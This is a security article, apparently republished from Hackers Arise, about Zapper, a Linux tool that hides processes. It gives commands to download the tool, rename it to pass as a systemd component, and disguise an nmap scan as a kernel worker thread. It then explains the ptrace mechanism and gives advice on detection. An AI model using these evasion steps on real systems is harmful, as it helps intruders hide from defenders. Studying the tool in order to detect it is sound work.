How Ukrainian Cyber Warriors Use Zapper to Hide Malicious Linux Processes

Intro: Experienced attackers think like defenders, know what logs look like and how SIEM alerts fire, so they adopt advanced stealth techniques. Zapper is a representative stealth tool that has even been used in the Ukrainian cyber war.

What Is Zapper?

Zapper is a Linux‑only process‑hiding utility developed by the well‑known hacker group Hacker’s Choice. Unlike crude hiding methods, its implementation is elegant and low‑impact.

Key features described by the developers:

No root required: It can run without elevated privileges, which is critical because early‑stage intruders often lack root.

Supports static binaries: It works even when the target runs a statically compiled Go program.

Comprehensive hiding scope: It can hide command‑line arguments and the process’s environment variables visible in /proc/<PID>/environ.

Does not rely on LD_PRELOAD or libc tricks: Zapper uses ptrace() to manipulate the ELF auxiliary vector, avoiding detection mechanisms that monitor library hooking.

Extremely low performance overhead: The authors report an overhead of roughly one‑thousandth (0.1%), making it practically invisible to performance monitoring.

"-n <pid>" trick: Allows Zapper to launch a target program under any specified PID by rapidly creating and terminating processes until the desired PID aligns, enabling the malicious process to masquerade as a legitimate system service.

Using Zapper

Obtaining the binary

The first step is to download the binary from the official release page:

$ curl -fL -o zapper https://github.com/hackerschoice/zapper/releases/latest/download/zapper-linux-$(uname -m) && chmod 755 zapper && ./zapper -h

In practice, defenders often monitor HTTP traffic for suspicious domains such as "hackerschoice". Attackers therefore host the binary on compromised servers and rename it to a legitimate‑sounding name, e.g.: $ mv zapper systemd-control Placing the renamed binary in /lib/systemd/ and matching timestamps makes it indistinguishable from a genuine systemd component, illustrating why blue teams cannot rely solely on file names.

Running a hidden process

Executing the renamed binary shows its help menu: $ ./systemd-control -h Zapper enables several stealth techniques:

Full hiding: Both the binary itself and all its child processes are concealed.

Creating hidden tmux sessions: Persistent connections that remain invisible in normal process listings.

Hiding command‑line arguments: Even when the process name is visible, all options can be stripped, making the process appear benign.

Practical demo: hiding an nmap scan

To illustrate, Zapper can wrap a typical nmap scan so that the process pretends to be a kernel worker thread:

$ exec ./systemd-control -f -a '[kworker/2:2-events_power_efficient]' nmap IP -Pn -sV -sC > /dev/shm/scan.txt &

The scan runs in the background, and standard ps or grep commands reveal no suspicious entries. The results are written to /dev/shm/scan.txt, demonstrating a realistic stealth technique used by penetration testers.

Technical Principles

Zapper’s core relies on creative abuse of Linux’s process‑tracing mechanism. When a process attaches to another via ptrace(), it can intervene on specific system calls. Zapper tracks fork and exec events and modifies the process’s displayed information without triggering obvious anomalies.

The crucial data structure is the ELF auxiliary vector, populated by the kernel at program load and containing information for the dynamic linker. By using ptrace() to directly edit this vector, Zapper alters what the /proc filesystem reports, avoiding any library‑function hooks or the LD_PRELOAD mechanism that many security tools monitor.

For defenders, this means traditional detection based on file names, process‑list traversal, or common hooking techniques may fail. Detection must shift toward behavior analysis and anomalous system‑call pattern recognition.

Defensive Recommendations

If you are on the defensive side, consider adding the following to your threat model:

Prioritize behavior detection over signature matching: Since Zapper hides without altering binaries, focus on unusual process‑creation patterns, especially parent processes that are unknown binaries.

Monitor data beyond /proc: Although Zapper conceals /proc entries, the attacker’s activities (network scans, file reads/writes) can still generate system‑level anomalies.

PID anomaly detection: The -n <pid> option forces a process to run under a specific PID, leading to abnormal PID allocation bursts. Watching for rapid PID creation and destruction can reveal this behavior.

Restrict suspicious download sources: Track access to known hacker‑tool repositories on GitHub, such as the "hackerschoice" organization, to catch attempts to fetch Zapper or similar utilities.

Original Information

Original title: Zapper – How Hackers Hide Malicious Process<br/> Source: Hackers Arise<br/> Link: https://hackers-arise.com/linux-zapper-how-hackers-hide-malicious-process/